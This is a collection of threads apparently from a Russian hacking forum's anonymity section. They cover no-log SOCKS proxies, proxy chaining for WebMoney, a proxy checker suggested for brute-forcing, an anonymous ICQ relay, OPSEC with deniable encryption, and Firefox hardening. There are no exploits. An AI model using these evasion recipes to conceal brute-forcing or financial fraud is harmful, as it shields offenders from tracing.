Last Post: 2008-11-20T23:05:40+0000
Author: WhiteChapelHomeless
Replies: 0 Views: 2K

Где можно купить хорошых соксов? Может знает кто такой сервис? ну и конешно же штобы невели логов.
Ваше мнение, кто какой сервис юзаит? реклам много а отобрать што же все таки хорошое и безапасно очен трудно.

Proxy Checker Lite 1.1 - бесплатный чекер

ID: 676533bbb4103b69df371ddc
Thread ID: 15293
Created: 2008-07-28T22:41:48+0000
Last Post: 2008-07-28T22:41:48+0000
Author: GoldMAN
Replies: 0 Views: 2K

Proxy Checker Lite 1.1 - это бесплатная версия прокси чекера. Программа основана на новом двигателе прокси тестирования. Она быстрая и надёжная. Эта программа определят скорость прокси и его IP который, возможно, отличен, чем прибываемый к нам ответ с него.

Скачать|Download
P.S. очень хорошая прога для чеканья паблик прокси, для брута например...
делимся мнениями.

Hide Ip platinum

ID: 676533bbb4103b69df371de7
Thread ID: 13007
Created: 2006-10-28T10:24:20+0000
Last Post: 2006-10-28T10:59:10+0000
Author: gareas
Replies: 1 Views: 2K

Сабж

ICQ анонимайзер.

ID: 676533bbb4103b69df371dec
Thread ID: 12238
Created: 2006-10-01T19:21:15+0000
Last Post: 2006-10-01T19:21:15+0000
Author: S-tamps
Replies: 0 Views: 2K

Добрый день, уважаемые мемберы.

Сервис ICQ-Gate перешел на новый уровень.
Вспомните, как часто Вам было нужно постучаться к человеку, но откровенно не хотелось светить ему свой ICQ. Просто потому, что Вы были не уверены в том, что Вам этот человек будет нужен для долгосрочного сотрудничества а также потому, что Вам просто не хотелось, чтобы человек знал Вашу постоянную асю. Сколько раз нужно было решить разовый вопрос, но не хотелось опять же асю светить.
Теперь Вы можете воспользоваться абсолютно анонимной и бесплатной системой отправки сообщений по ICQ. Все, что Вам необходимо сделать - это добавить ICQ бота себе в контакт-лист

ICQ 302-343

После этого, Вам достаточно просто отправить любое сообщение боту, чтобы получить список доступных команд - они предельно просты, и начать работу с ботом.

!start - начать сессию с соответствующим UIN

!end - закончить текущую сессию.

После того, как бот соединится с заданным Вами UIN, Вы можете спокойно беседовать с этим пользователем, отправляя сообщения боту и получая их от него же. Имя бота в списке пользователя - VPN Gate
В чем его отличительные особенности. Ведение логов отсутствует. Бот стоит под моим ВПН, поэтому даже в случае, если у Вас не стоит блокировка IP - отследить его смогут только до моего ВПН-сервера.
Одновременно ботом могут пользоваться 200 человек ( может быть открыто 200 сессий ). В случае, если количество людей больше, бот на запрос о соединении ответит, что превышен лимит пользователей. Тогда нужно немного подождать, пока не закроется ближайшая сессия. Время одной сессии не ограничено. В случае, если сессия неактивна 5 минут ( максимальный интервал между посланными и/или принятыми сообщениями ) - она автоматически сбрасывается, чтобы дать доступ другим пользователям.

Удачной работы.

openSSH

ID: 676533bbb4103b69df371df1
Thread ID: 11262
Created: 2006-09-01T15:15:11+0000
Last Post: 2006-09-01T18:17:35+0000
Author: Злюк
Replies: 5 Views: 2K

Сабж,никто незнает есть ли портации для Windows?

3proxy

ID: 676533bbb4103b69df371df4
Thread ID: 10921
Created: 2006-08-26T11:34:24+0000
Last Post: 2006-08-28T13:02:30+0000
Author: clauzs.t
Replies: 1 Views: 2K

в общем помогите с конфигом.
юзаю ВПН и хочу на хост сокс влепить, хочу чтоб не только IP менялся, но и ДНС.
тут нашёл статью Вуфа с данным конфигом:
nserver 127.0.0.1
users nick:CL:pass
auth strong
allow *
socks –p7855
internal 127.0.0.1
log /dev/null
так вот строка nserver как должна выглядеть, чтоб не спалить свой днс, или тут всё как надо мне отписано?
будет ли работать permer security driver после этого нормально с соксом или нужно ещё тот скрипт, который даёт Вуф, вешать на хост, чтоб порт открылся?
вот линк на статью
http://www.xss.is/index.php?showtop...&pid=7797&st=0&

вопросы для меня очень острые, прошу ответить как можно точнее и скорее - с меня 10 соксов анонимных любого гос-ва

EES Gateway

ID: 676533bbb4103b69df371df9
Thread ID: 9648
Created: 2006-07-03T13:48:34+0000
Last Post: 2006-07-03T13:48:34+0000
Author: MekJack
Replies: 0 Views: 2K

Весьма полезная как мне кажется программа, поможет в создании backconnect'a для тех у кого нет внешнего айпи( как предполагается ). Правда мне так и не удалось пока что с ней разобраться, кто-нибудь пользовался ей ? кто может поделиться опытом ? ( у меня статичный айпи, я в обычной сети, но он далеко не внешний.., такой же айп имеют всё юзеры моей подсетки, пытаюсь найти способ устраивать back connect ).

http://chasenet.org/home/products/ees-gateway/

Работа вебмани через сокс

ID: 676533bbb4103b69df371dff
Thread ID: 8889
Created: 2006-06-01T09:03:14+0000
Last Post: 2006-06-01T09:03:14+0000
Author: Mail2k
Replies: 0 Views: 2K

Давно интересовала мануал по данной теме.Нашёл в инете интересную статейку.Думаю, будет полезна тем,кто ещё не разобрался как юзать кипер через сокс:

Нужны две проги:
Permeo Security Driver и Ufasoft Sockschain

Вот инсрукция как настроить их (откуда взял, не помню):

Настройка SocksChain
1. Добавляем прокси, есть два способа:
а) Файл -> Импорт -> Ваш список прокси (взять можно из паблика любых)
б) Инструменты -> Proxy manager -> Add -> Вставляете из буфера -> OK
2. Прокси загрузили, нужно их прочекать:
Инструменты -> Proxy manager -> Test all
Если рядом с вашим прокси рисунок лампочки - значит ок, прокси рабочий, если кружок с крестиком - значит прокси мертв (ну тут все понятно, нужно искать еще).
3. Настраиваем нашу цепочку:
Service -> Modify (появляется окно, пройдемся по пунктам)
Имя: Chain

Входящий порт: 1080

Auto-creating chain: ставим галочку

Change the chain every: пишем число побольше, например, 99999999

Chain Length: тут можно указать количество прокси в вашей цепочке, чем больше прокси в вашей цепи - тем безопаснее, но и скорость заметно уменьшается, рекомендую от 1 до 3

Ниже находится маленкое окно, тут будет отображаться ваша цепочка из прокси, число в графе "Chain Length" должно соответствовать числу проксей в этом маленьком окне, т.е. если вы поставили в Chain Length "2", то и проксей
в окне должно быть тоже два.

Справа список всех ваших соксов/прокси, чтобы добавить прокси в цепочку (в то маленькое окошко), кликаем на прокси (т.е. выделяем его) и нажимаем кнопку Add, если вам нужно, чтоб в цепочке было, например, 2 прокси повторяем действие. Ниже есть еще одно маленькое окошко, нам оно не интересно, оно должно быть пустым (если там есть сокс, удалите его кнопкой Delete). Нажимаем OK.

4. Инструменты -> Options -> Общие
Количество потоков: 30 (выбираете сами)
Time-out: 99999 s (выбираете сами)
Sessions time out after 99999 seconds of inactivity: (выбираете сами)
Enable connections only from localhost (127.0.0.1) (отмечаем)
Save Log to file SocksChain.log (можно отметить, можно не отмечать)
Fast disconnect (убираем галочку)
Инструменты -> Options -> Общие -> Proxy отмечаем Directly и Resolve domain names locally
Инструменты -> Options -> Upgrade отмечаем Enable Interaction with site. Нажимаем OK.
Все, SocksChain настроили

Настройка Permeo Security Driver
1. Главное окно, вкладка General Select the zone of service помечаем графу In office и нажимаем Edit,
Proxy -> New (рисунок листа с+), отмечаем графу Socks5 -> Name or adress (пишем 127.0.0.1) Port (пишем 1080) -> OK
Applications -> помечаем Proxy all -> Exclude list -> Add -> указываем место, где находится SocksChain (обычно это C:\Program Files\Ufasoft\SocksChain\SocksChain.exe) -> OK -> Применить -> OK -> Применить -> OK

Проверьте, чтоб во время работы в Permeo у вас стоял режим "In Office"
Bсе, теперь можно запускать и WebMoney Keeper, и оперу, и асю, все будет работать серез прокси. Проверить какой у вас IP можно на leader.ru (и ему подобных, ну или в самом же Кипере при запуске показывается IP)

Теперь все проги будут работать через проксики из соксчейна, в самих прогах никакие прокси указывать не надо.

Вебмани будет работать, проверено.

AAtools

ID: 676533bbb4103b69df371e00
Thread ID: 8209
Created: 2006-05-04T12:48:30+0000
Last Post: 2006-05-31T00:08:20+0000
Author: BeaR
Replies: 1 Views: 2K

Нужна помощб в настройке этой программы :help:
кто пользуется ей, объясните плиз

Sticky Password

ID: 676533bbb4103b69df371e02
Thread ID: 8612
Created: 2006-05-23T15:42:04+0000
Last Post: 2006-05-23T15:42:04+0000
Author: Robin Gud
Replies: 0 Views: 2K

Sticky Password 2.7.0.1633
- новая версия программы, которая запоминает и автоматически вводит пароли и другие поля для любого сайта или любой программы на вашем компьютере, в том числе для Internet Explorer и Mozilla Firefox. Уникальный способ доступа к сохраненным паролям. Вам не нужно запоминать имя сохраненной записи и искать его в списке паролей. Формы, где требуется логин, пароль или сохраненные вами дополнительные поля заполняются автоматически.
Возможности Sticky Password:
- Пароли хранятся в защищенном виде Защитник паролей противостоит кейлоггерам и другим шпионским программам. Он информирует пользователя о попытках компьютерных программ и библиотек заполучить информацию из других программ.
- Пароли защищены мощными алгоритмами шифрования, которые невозможно взломать за приемлемое время.
- Заполнение форм работает со всеми программами и браузерами
- Вы можете сохранить несколько паролей и логинов для одного аккаунта.
- Измененные или удаленные пароли могут быть восстановлены в любое время

Скачать|Download

Безопасность Внутри Домашней Сети

ID: 676533bbb4103b69df371e06
Thread ID: 7707
Created: 2006-04-09T12:10:50+0000
Last Post: 2006-04-09T13:10:58+0000
Author: Alexey1
Replies: 3 Views: 2K

Ребята, вопрос такого характера…
У меня дома с соседом сеть протянута (2 компа). Сейчас собрался поставить себе выделенный инет, т.е.мне до компа протянут сетевой кабель, а все кто подключены к этому провайдеру объедены в общую сеть и мой комп тоже получится в ней. Но я не хочу чтоб всякие «левые» копошились по моему компу, т.е.хочу его закрыть от посторонних, но так чтобы мой сосед мог спокойно заходить на мой комп. А то найдутся ведь такие неспокойные, которые начнут лезть куда им не положено Что посоветуете сделать? Просто создать нового пользователя в lusrmgr.msc под паролем и чтоб мой сосед только через этот пароль смог заходить, а другие только если пароль знают или что-то получше посоветуете? Заранее всем спасибо за ответы!

Purple Team Field Manual

ID: 676533bbb4103b69df371c0e
Thread ID: 50373
Created: 2021-04-06T19:19:27+0000
Last Post: 2021-04-06T19:19:27+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 1K

Red teams can show flaws that exist in your network before they are compromised by malicious actors and blue teams traditionally assess current security measures and identify security flaws. The teams can provide valuable feedback to each other, but this is often overlooked, enter the purple team. The purple team allows for the integration of red team tactics and blue team security measures. The purple team field manual is a manual for all security professionals and integrates red and blue team methodologies.

[ Purple Team Field Manual.pdf

](https://cloud.mail.ru/public/Br1e/oxJqw88JZ)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

эффективное достижение максимального уровня анонимности

ID: 676533bbb4103b69df3718ee
Thread ID: 124108
Created: 2024-10-04T14:12:00+0000
Last Post: 2024-12-12T18:43:29+0000
Author: OldFont
Replies: 6 Views: 1K

приветствую всех, не уверен были ли подобные темы на форуме (искал, не нашёл) потому напишу свою

В этом посте я распишу только то , что уже очень долго давит мне на голову, что думаю на этот счёт, а также спрошу пару советов

интересует вопрос эффективного достижения максимального уровня анонимности. Я имею в виду такие методы, которые позволяют максимально обезопасить свою систему (ПК) начиная от хардварного уровня и заканчивая сетевыми манипуляциями, но обезопасить так, чтобы процесс OPSEC не был слишком дорогостоящим, трудным и затрудняющим дальнейшее использование (т.е. целесообразно проводить работу до тех пор, пока это эффективно).

Приведу пару простых примеров неэффективных и неудобных (по моему мнению) но очень безопасных решений:
- на linux использовать дистрибутивы не использующие systemd
- использование Linux-libre ядра, взамен обычному
- использование исключительно тех дистро, которые признаныFSF

Советы выше буквально являются деструктивными т.к. они являются причинами холиваров, в то же время внося "призрачный" вклад в OPSEC пользователя и причиняя уйму неудобств связанных с недостатком умений / знаний

Теперь перейду к тому, что на данный момент я имею в голове на счёт "правильной" анонимности.

1. Использование coreboot взамен UEFI/BIOS. Спорная тема, так как coreboot поддерживается не на всех платах, а его портирование на свою является сильной проблемой
проблема uefi/bios не в заводских бекдорах (хотя это тоже) но и в уязвимостях по типу обхода secure boot. Это создает вероятность заражения буткитом, что очень неприятно, потому хотелось бы услышать ваше мнение насчет coreboot, стоит того?

2. Использование dualboot
к сожалению, не все люди столь богатые чтобы реализовать себе несколько устройств тем самым обезопасив рабочее место.
лично я имею надобность как в достаточно безопасной и свободной ОС так и в достаточно удобной userfriendly ОС, единой и сбалансированной к сожалению я не обнаружил, потому я хочу сделать связку dualboot:
Некий Linux (arch, devuan) + Win10, win10 будет иметь 1 накопитель чисто под крякнутое ПО, игры, linux будет иметь 2 накопителя под другие задачи, вопрос такой: Возможно ли реализовать отключение питания дискам #1 #2 при использование win10? и наоборот, отключение питания диску #3 при использовании linux, это сильно повысит безопасность, и можно будет избежать компроментации данных второй системы при заражении первой + хотелось бы услышать про загрузчики для dualboot по типо GRUB, может у них есть какие то изъяны? какое ваше общее мнение?
p.s. из плюсов dualboot - никакой эмулятор qemu kvm не сможет так глубоко эмулировать виндовс как его нативная версия для различных тестов

3. Использование amd вместо intel
на платах с intel чипсетом присутствует микроконтроллер Intel Menagment Engine, он имеет свой собственный ipv4 интерфейс, свой mac адрес. Ваше мнение?
p.s. вопрос по железу! - может кто подскажет какую мат плату можно приобрести, из условий: am4 сокет, адекватная цена, возможность прошиться под coreboot (не обязательно) или прошиться актуальными uefi/bios образами от производителя без эксплойтов и крит уязвимостей? (уязвимости которые могут быть эксплуатированы только при определенных редких условиях или только при физическом доступе не стоит расматривать как критические или даже высокие)

4. использование безопасных образов \ дистро
главной осью можно выбрать arch или devuan, накатывать файрволл и обновления + проводить аудит не считаю трудной задачей (для всего подозрительного существуют VM которые также будут использоваться на нашей главной системе)
win10 ось ставится оригинальная и чиститься от телеметрии и другого говна используя разные тулзы из сети
ваши рекомендации?

5. whonix под qemu/kvm на нашей главной системе (тут всё понятно)
есть пару вопросов по поводу использования торифицированной ВМ, хотелось бы узнать: как использовать монеро кошельки? (буду использовать чужие доверенные ноды) через тор пиздец как долго синхронизируется, или вообще прерывается
ситуация с btc кошельками такая же? подскажите как это можно ускорить и какие кошели лучше использовать? возможно ли установить мобильный эмулятор на ВМ? на вм на виндовс была проблема, в virtualbox в настройках недоступна галочка amd-v / intel-vt, хотя проц поддерживает виртуализацию и в bios включена, как так? и может дадите общие рекомендации как ускорить и оптимизировать работу ВМ, ГПУ прокидывать не буду

6. полнодисковое шифрование veracrypt (тут тоже всё понятно)
не уверен, но вроде как возможно реализовать схему, когда вводя пароль #1 мы попадаем на некую систему #1, а вводя пароль #2 мы попадаем на систему #2, это решит сразу 2 проблемы: создание правдоподобного отрицания в случае когда из тебя насильно выбивают пароль и возможность упрощения dualboot (может я несу х#йню, ибо никогда не слышал как реализуется такое "двойное" шифрование и как это работает да и возможно ли такое вообще я не уверен, если и возможно получиться ли реализовать метод с отключением питания неиспользуемым дискам?). Ваше мнение на этот счёт?

7. (не связано opsec) долговременное хранение данных (15+ лет)
есть много данных и много внешних hdd купленных у официальных селлеров, данные есть как чувствительные так и не очень, как их можно хранить? внешние харды просто пыляться в ящике из пенопласта и прочной коробке, данные могут быть утеряны в результате очень долгого простоя? если да то как это избежать?

8. (чуть отдалимся физически от ПК) прошивка своих устройств - здравая мысль, так стоит ли прошивать свой ведроид на относительно свободные ОС? подскажите ОС какие сами использовали и их изъяны, возможно ли будет в них создать виртуальный контейнер для гос. приложений которые потенциально бекдоры? у них будет доступ лишь к выделенной ПЗУ памяти. Также это оптимизирует расход батареи / трафика на всякие фоновые мусорные гугловские процессы
Стоит задеть и роутер, нужно ли прошивать роутер под openwrt? могу ли я настроить там приколы для ускорения udp/tcp трафика? очевидные плюсы это zapret, возможность наката впн, возможность наката dnscrypt, возможность наката bittorrent + инструментов для создания информационного шума

В основном тут лишь то, что меня беспокоит, для грамотного opsec есть вагон тем для изучения, которым этой темы будет маловато
Возможно я что то забыл или упустил, тогда позже отредачу или комментарий добавлю. если где то проебался - укажите, буду рад любому совету или замечанию

Настройки Mozilla Firefox для параноиков и тест Mullvad Browser

ID: 676533bbb4103b69df3718f8
Thread ID: 118003
Created: 2024-07-02T03:33:52+0000
Last Post: 2024-11-28T13:42:09+0000
Author: ShadowHawk
Prefix: Статья
Replies: 1 Views: 1K

Mozilla Firefox - настоящий долгожитель, этот браузер, разрабатываемый условно-независимой некоммерческой организацией (донатит им в основном Google) остается предпоследней надеждой на приватность. Во всяком случае, так нам говорят его разработчики. На самом же деле он нафарширован всякими механизмами слежки за пользователем, НО: их можно выключить. И я таки расскажу вам как это сделать.

Эта статья - гибрид двух тем. С одной стороны, это полноценный гайд по тому как привлечь Firefox на сторону анонимуса, изменив настройки. С другой, это еще и анализ того, какие из этих настроек “из коробки” правильно проставлены в новом браузере, претендующем на анонимность и приватность без допиливания.

Браузер Mullvad - новинка от разработчиков Mullvad VPN и команды Tor Project. Ничего себе кроссовер, да? Вот и я так подумал, и решил протестировать браузер. У меня на канале сегодня будет (или уже) опубликован видеообзор нового претендента на роль "приватного и защищенного браузера". Здесь же я пройдусь по настройкам, которые рекомендуется внести в Firefox для оптимальной защиты от фингерпринтинга, чтобы посмотреть, какие из них уже выставлены нужным образов в Mullvad Browser.

В качестве "эталона" по настройкам я буду отталкиваться от гайда https://brainfucksec.github.io/firefox-hardening-guide#firefox-preferences (англ), и для моих не владеющих языком и не понимающих некоторых настроек читателей я дам комментарии к некоторым пунктам. Да, это будет чертов лонгрид.

Поиск

Первым делом рекомендуется начать использовать поисковый движок, который не собирает огромную кучу данных про пользователя. Рекомендуется использовать DuckDuckGo

В MullvadBrowser по умолчанию он и стоит.
В любом браузере на базе Firefox эта опция переключается так:

вводим в строку браузера about:preferences#search

выбираем DuckDuckGo

Тонкая настройка -about:config

То, какие настройки мы можем лицезреть и всячески менять, выбрав в меню браузера Settings или введя about:preferences в строку браузера - это всего лишь верхушка айсберга. Настоящая, тонкая настройка осуществляется в специальном интерфейсе, который открывается введением в строку браузера about:config

Опции в этом разделе это не кнопочки и переключалочки, а значения option = value, и когда вы заходите в этот раздел браузер вас предупреждает, что тут серьезные дяди и тети работают, если ты не уверен в своей серьезности, то руки в карманы и иди смотри лучше мультики. Проще говоря, вам показывают ворнинг что тут можно поломать браузер кривой настройкой.

Дальше, чтобы вы не запутались, будет идти настройка и значение, которое ей нужно задать. Если рядом с настройкой стоит символ значит в Mullvad Browser настройка совпадает с оптимальной и менять ничего не надо. Если стоит символ значит нужно поменять эту настройку.

Настройки запуска

Настраиваем домашнюю страницу и поведение при запуске

browser.aboutConfig.showWarning = false

Эта настройка всего лишь уберет предупрежедние о том, что заходя в конфиг надо быть бдительным. Не влияет на приватность и анонимность.

Click to expand...

browser.startup.page = 1

Этот параметр определяет, что будет открыто после запуска браузера. Значение 1 означает, что будет открыта пустая вкладка.

Click to expand...

browser.startup.homepage = "about:home"

Значение в Mullvad: about:mullvad-browser

Определяет домашнюю страницу, то есть открываемую браузером по умолчанию или по нажатию на "домашняя страница". В случае с mullvad-browser выставленный в нем параметр это и есть home, если ввести about:mullvad-browser или about:home поведение абсолютно одинаковое.

Click to expand...

Результаты: 2 из 3

Запрещаем Activity Stream

Activity Stream - это показ на пустой вкладке страниц, которые вы недавно посещали или куда заходили часто. Настройки ниже отключают все, связанное с этой удобной для отслеживания пользователя функциональностью браузера.

browser.newtabpage.enabled = false

Если значение выставлено как true, браузер будет при открытии новой вкладки показывать вам историю и часто посещаемые страницы

Click to expand...

browser.newtab.preload = false

Если этот параметр указан как true, браузер начнет загружать домашнюю страницу в фоновом режиме при запуске браузера, до того как вы вообще хоть что-то нажмете или введете адрес. Переводя значение в false мы снижаем нагрузку на оперативную память.

Click to expand...

browser.newtabpage.activity-stream.feeds.telemetry = false

Если этот параметр выставлен как true, браузер будет отправлять разработчикам сведения о том, как у вас используется функция вывода истории и часто посещаемых страниц

Click to expand...

browser.newtabpage.activity-stream.telemetry = false

Если этот параметр выставлен как true, браузер будет отправлять разработчикам сведения о том, как у вас используется функция вывода истории и часто посещаемых страниц

Click to expand...

browser.newtabpage.activity-stream.feeds.snippets = false

Если этот параметр выставлен как true, то при включенном фиде посещенных сайтов браузер будет загружать и отображать сниппет страницы (краткую текстовую выжимку и картинку), то есть будет отправлять запросы туда, куда мы его не просили.

Click to expand...

browser.newtabpage.activity-stream.feeds.section.topstories = false

В положении true этот параметр выводит на пустую вкладку контент от партнеров (рекламодателей) Firefox. Это дополнительные запросы которых мы не хотели, дополнительная нагрузка на систему и взаимодействие с трекерами на сайтах, куда мы не имели намерения заходить.

Click to expand...

browser.newtabpage.activity-stream.section.highlights.includePocket = false

Если выставлен как true, этот параметр позволит браузеру выводить на пустую вкладку контент из Firefox Pocket, облачного сервиса куда вы можете (но не рекомендуется) сохранять всякие находки в сети.

Click to expand...

browser.newtabpage.activity-stream.feeds.discoverystreamfeed = false

Этот параметр требуется создать , если он выставлен в положение true, позволяет браузеру, основываясь на ваших интересах (слежке за вашим серфингом) подсказывать вам рекомендации контента. Нам такого не надо.

Click to expand...

browser.newtabpage.activity-stream.showSponsored = false

Если значение true, браузер будет показывать вам "контент от спонсоров", то есть рекламу. Что мы говорим богу интернет-рекламы?

Click to expand...

browser.newtabpage.activity-stream.showSponsoredTopSites = false

Браузер будет показывать в рекомендациях спонсорские сайты, если значение true.

Click to expand...

browser.newtabpage.activity-stream.default.sites = ""

Еще одна попытка показать вам "топ сайтов", теперь уже по параметру их общей популярности. Покажет гугл, ютуб и тому подобное. **Параметр удален из Mullvad Browser.

Click to expand...

**Результаты: 9 из 14 пунктов настроены как надо.

Геолокация

Наш любимый раздел, про то как браузер может отслеживать наше местоположение. И конечно же про то, что мы ему на это скажем.

geo.provider.network.url = "https://location.services.mozilla.com/v1/geolocate?key=%MOZILLA_API_KEY%"

Этот параметр определит, какой службой воспользуется браузер если мы дадим разрешение на определение геопозиции. Параметр удален из Mullvad Browser

Click to expand...

Ниже параметры, которые запрещают браузеру пользоваться вшитыми в ОС службами геолокации. Для разных ОС параметры разные.

geo.provider.ms-windows-location = false (Windows)
geo.provider.use_corelocation = false (macOS)
geo.provider.use_gpsd = false (Linux)
geo.provider.use_geoclue = false (Linux)

Два параметра ниже определяют возможность браузера определять ваш регион

browser.region.network.url = ""

Параметр выпилен из Mullvad Browser, а так он определяет URL по которому браузер будет обращаться к службе определения региона

Click to expand...

browser.region.update.enabled = false

В целом определяет, включена ли функция определения региона. Если true - значит включена.

Click to expand...

За настройки геолокации Mullvad Browser получает 7 из 7.

Язык и локаль

intl.accept_languages = "en-US, en"

Указываем, что по умолчанию мы хотим видеть сайты на английском языке. Английский это "универсальный язык", он есть во всех ОС. А вот предпочтение смотреть контент на русском, например, четко указывает что вы вероятнее всего носитель языка, и тем самым "палите" свою национальность.

Click to expand...

javascript.use_us_english_locale = true

Параметр требуется создать и указать тип значения Boolean, и установить как True. Этот параметр задает значение по умолчанию для javascript-кода, относительно того как требуется форматировать строки применительно к числам и датам. Если параметр задан как true, браузер будет использовать форматирование, принятое в US English: запятые как разделитель в дробном числе, даты в американском формате. Если он не создан или указан как false, то будет использован тип форматирования из вашей ОС.

Click to expand...

Результат Mullvad Browser: 1 из 2

Автоматические обновления и рекомендации

Здесь мы ступаем на тонкий лёд. Если это ваш "боевой" браузер для OSINT и прочих шалостей, обновления рекомендуется отключить , и устанавливать их строго вручную, предварительно изучив что нового напридумывали разработчики. Это нужно сделать для того, чтобы не оказалось, что в обновленной версии браузера появился новый замечательный параметр, который позволяет нейросети, масонам или рептилоидам смотреть за вашими сетевыми похождениями, а вы его не отключили просто потому что ни вы, ни кто-то еще не мог предугадать появление такого параметра.

Также, при установке обновы у вас могут поотлетать всякие браузерные дополнения, в общем при автообновлениях вы теряете контроль над браузером. Если уж ты решил превратить дедову "волгу" в свой личный бэтмобиль, не спрашивай у производителя про гарантийное обслуживание. Ты теперь сам за него отвечаешь.

app.update.background.scheduling.enabled = false

Параметр требуется создать

Click to expand...

app.update.auto = false

В целом включает (true) или выключает (false) автообновления

Click to expand...

Параметры ниже используют Google Analytics, а также историю посещенных сайтов и список уже установленных у нас в браузере дополнений чтобы посоветовать нам какие дополнения поставить.

extensions.getAddons.showPane = false
extensions.htmlaboutaddons.recommendations.enabled = false
browser.discovery.enabled = false

Результат: 3 из 5

Телеметрия

Ну а это уже прям слежка-слежка, телеметрия это всякие разные показатели того, как же вы пользуетесь браузером. Служба телеметрии регулярно формирует отчет и отправляет его разработчикам, если мы это не выключим.

datareporting.policy.dataSubmissionEnabled = false
datareporting.healthreport.uploadEnabled = false
toolkit.telemetry.enabled = false
toolkit.telemetry.unified = false
toolkit.telemetry.server = "data:,"
toolkit.telemetry.archive.enabled = false
toolkit.telemetry.newProfilePing.enabled = false

Ну вот, так хорошо все начиналось. Но разработчики Mullvad Browser не смогли себе отказать в самой базовой телеметрии. Этот параметр отсылает им "пинг" каждый раз, когда вы создаете новый профиль браузера.

Click to expand...

toolkit.telemetry.shutdownPingSender.enabled = false

Этот параметр, будучи включенным, позволит браузеру отправлять на сервера разработчиков сведения о закрытии браузера, о причине закрытия (пользователь закрыл или браузер сам упал), а также дату и время события.

Click to expand...

toolkit.telemetry.updatePing.enabled = false
toolkit.telemetry.bhrPing.enabled = false
toolkit.telemetry.firstShutdownPing.enabled = false

Тот же пинг при выключении, но отправляемый только один раз, при первом закрытии браузера. Видимо по мнению разрабов один раз не ....

Click to expand...

toolkit.telemetry.coverage.opt-out = true
toolkit.coverage.opt-out = true
toolkit.coverage.endpoint.base = ""

Параметр нужно создать и оставить значение пустым. Вообще же параметр содержит URL по которому браузер отправлял бы некоторые отчеты.

Click to expand...

browser.ping-centre.telemetry = false
beacon.enabled = false

Результат по телеметрии: 10 из 16

Исследования

Это тоже вид слежки, но немного другой. Телеметрия - это данные, которые (предположительно) собираются, чтобы оценивать работоспособность браузера и отлавливать ошибки. А вот исследования (studies) изучают поведение пользователей.

app.shield.optoutstudies.enabled = false

Если этот параметр включен (true), браузер будет собирать о вас данные, если вы отдельно не запретите это.

Click to expand...

app.normandy.enabled = false
app.normandy.api_url = ""

Normandy это как поправки к конституции: снаружи красивый фантик, а внутри сюрприз. Эта служба вроде как делает ценную работу - позволяет разрабам особо важные обновления, закрывающие какие-то уязвимости браузера, устанавливать без необходимости обновлять браузер целиком. Однако, еще эта служба используется и для того, чтобы собирать данные в рамках тех самых исследований вашего поведения.

Click to expand...

Результат: 3 из 3

Сообщения о падении браузера

В crash report-ах все так же на сервера разработчиков браузера может утекать инфа о нашем устройстве, просто повод для отправки другой.
breakpad.reportURL = ""
browser.tabs.crashReporting.sendReport = false

В целом хорошо что служба отключена, но URL не удалили. 1 из 2

Captive portal detection - страница авторизации WiFi

Когда вы подключаетесь к какой-то WiFi точке впервые, браузер по умолчанию делает проверку на наличие страницы авторизации. На тот случай, если нужно осуществить вход через СМС или как-то еще. Браузер делает это пытаясь загрузить файл http://detectportal.firefox.com/success.txt. Если файл удалось загрузить - значит интернет есть, а значит искать и показывать страницу авторизации не нужно. Но такое поведение означает, что когда вы подключитесь к WiFi, браузер совершенно вас об этом не спрашивая сделает HTTP- запрос к серверу разработчиков.

captivedetect.canonicalURL = ""
network.captive-portal-service.enabled = false

Как видите, такой функционал в целом в Mullvad Browser отключен, но лучше в целом устранить его, удалив из браузера URL для таких запросов.

Click to expand...

В целом хорошо что служба отключена, но URL не удалили. 1 из 2
Проверка сети средствами ОС

Если нижеуказанный пункт настроек включен (true), браузер будет проверять статус и параметри сетевого соединения, запрашивая его у ОС. А ОС на свое усмотрение будет использовать те механизмы, которые в ней имеются.

network.connectivity- service.enabled = false

Безопасный просмотр

Служба безопасного просмотра использует Google Safe Browsing - набор служб понятно от кого. Ее задача - защищать пользователя от вредоносов и фишинговых сайтов. Если сайт помечен как распространяющий вредоносное ПО или как фишинговый, браузер откажется его загружать. Для рядового пользователя это действительно защита. Для нас же - еще один слой слежки и цензуры, поэтому мы это отключаем. Делайте это осознавая риски, желательно в защищенной ОС.

browser.safebrowsing.malware.enabled = false
browser.safebrowsing.phishing.enabled = false
browser.safebrowsing.blockedURIs.enabled = false
browser.safebrowsing.provider.google4.gethashURL = ""
browser.safebrowsing.provider.google4.updateURL = ""
browser.safebrowsing.provider.google.gethashURL = ""
browser.safebrowsing.provider.google.updateURL = ""
browser.safebrowsing.provider.google4.dataSharingURL = ""
browser.safebrowsing.downloads.enabled = false
browser.safebrowsing.downloads.remote.enabled = false
browser.safebrowsing.downloads.remote.url = ""
browser.safebrowsing.downloads.remote.block_potentially_unwanted = false
browser.safebrowsing.downloads.remote.block_uncommon = false
browser.safebrowsing.allowOverride = false

Результат: 10 из 14
Сеть, DNS, прокси и IPv6

Готовьтесь, в этом разделе вас ждет реальное дерьмо - целый рассадник разных компонентов браузера, которые анализируют ваше поведение и создают кучу "левых" сетевых запросов.

network.prefetch-next = false

Если настройка включена (true), то браузер будет заранее запрашивать и загружать страницы, ссылки на которые есть на той страницы, которую вы просматриваете. Это сделано для ускорения, чтобы когда вы ходите по сайту было ощущение "мгновенной загрузки".

Click to expand...

network.dns.disablePrefetch = true

Если настройка выключена (false), то в дополнение к предзагрузке самих веб- страниц из пункта выше, браузер будет также предзагружать инфу из DNS по доменам, на которые ссылается страница.

Click to expand...

network.predictor.enabled = false

Этот пункт управляет тем, включен ли "предиктор", или предсказатель браузера. Эта штуковина пытается предсказать, какие ссылки вы скорее всего нажмете на загруженном сайте, и заранее подгружает документы по этим ссылкам в кэш браузера. И делает браузер это (если функция включена) анализируя: историю вашего браузера, закладки, частоту посещения тех или иных сайтов, clickstream - паттерны того как вы кликаете мышкой, а также сетевую информацию.

Click to expand...

network.http.speculative-parallel-limit = 0

В этом пункте устанавливается лимит на то, сколько таких "предсказанных" страниц браузеру позволено предзагрузить в кэш.

Click to expand...

browser.places.speculativeConnect.enabled = false

Этот пункт настроек, если включен, позволяет браузеру предзагружать сайты из ваших закладок (bookmarks а не то что вы подумали).

Click to expand...

network.dns.disableIPv6 = true

